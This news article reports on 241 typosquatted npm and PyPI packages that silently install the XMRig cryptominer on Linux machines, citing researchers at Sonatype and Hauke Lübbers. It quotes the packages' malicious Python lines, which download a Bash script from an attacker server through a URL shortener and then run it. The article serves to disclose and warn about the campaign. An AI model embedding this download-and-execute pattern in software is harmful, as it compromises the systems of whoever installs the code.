Skip links

241 npm and PyPI packages caught dropping Linux cryptominers



More than 200 malicious packages have been discovered infiltrating the PyPI and npm open source registries this week.

These packages are largely typosquats of widely used libraries and each one of them downloads a Bash script on Linux systems that run cryptominers.

PyPI, npm flooded with cryptomining packages

Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.

These packages are typosquats of popular open source libraries and commands like React, argparse, and AIOHTTP, but instead, download and install cryptomining Bash scripts from the threat actor’s server.

On Wednesday, software developer and researcher Hauke Lübbers shared coming across “at least 33 projects” on PyPI that all launched XMRig, an open source Monero cryptominer, after infecting a system.

55 typosquats laced with cryptominers flood PyPI (Hauke Lübbers)

While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.

“After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22,” Lübbers tells BleepingComputer.

“The packages targeted Linux systems and installed crypto mining software XMRig,” explains the software engineer.

The Python packages contain the following piece of code that downloads the Bash script from the threat actor’s server via URL shortener.

os.system(“sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1”)
os.system(“chmod +x .cmc >/dev/null 2>&1”)
os.system(“./.cmc >/dev/null 2>&1”)

The researcher explains the Bit[.]ly URL redirects to the script hosted on 80.78.25[.]140:8000.

“This was done by downloading and executing the Bash script from http://80.78.25[.]140:8000/.cmc”

Upon execution, the script notifies the threat actor of the IP address of the compromised host and if the deployment of cryptominers succeeded.

At the time of writing, we observed the IP address was down. But, BleepingComputer was able to obtain a copy of the script and we are able to confirm the researcher’s claims:

Excerpt from Bash script installing cryptominers (BleepingComputer)

The Sonatype security research team that I’m a part of, disclosed another 186 npm typosquatting packages today making contact with the same URL to download the malicious Bash script.

npm packages pull malicious code from the same URL (Sonatype)

It appears that both registries cleared the typosquats fairly quickly from their platforms before these could do more harm to developers.

Despite various security enhancements, like mandating two-factor authentication for critical projects and introducing new features (like Python’s setuptools moving towards replacing, it seems the open source repository’s race against threat actors is only getting even more challenging.

Last week, software security company Checkmarx reported discovering a dozen malicious Python packages performing DDoS attacks on Counter-Strike servers.

Earlier this month, cybersecurity firm CheckPoint outed 10 malicious PyPI packages caught stealing developer credentials.

In July, ReversingLabs researchers disclosed a supply chain attack dubbed IconBurst that once again, exploited typosquatting to infect developers.

Adblock test (Why?)